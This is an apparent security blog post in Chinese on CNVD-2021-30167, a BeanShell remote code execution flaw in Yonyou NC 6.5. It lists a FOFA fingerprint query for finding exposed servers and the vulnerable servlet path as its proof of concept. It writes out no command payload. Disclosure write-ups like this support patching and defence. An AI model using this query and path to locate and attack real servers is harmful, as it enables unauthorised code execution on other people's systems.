用友NC BeanShell远程代码执行

发表于2021-06-05|更新于2024-12-20|security

|总字数:32|阅读时长:1分钟|浏览量:

1.影响版本

NC6.5版本

2.漏洞复现

FOFA语句：

icon_hash="1085941792"

3.执行命令

PoC:

/servlet/~ic/bsh.servlet.BshServlet

图 0

图 1

文章作者: Hao

文章链接: https://www.hao.kim/archives/security/cnvd-2021-30167.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps！

CNVD-2021-30167 用友NC

赞助

微信

评论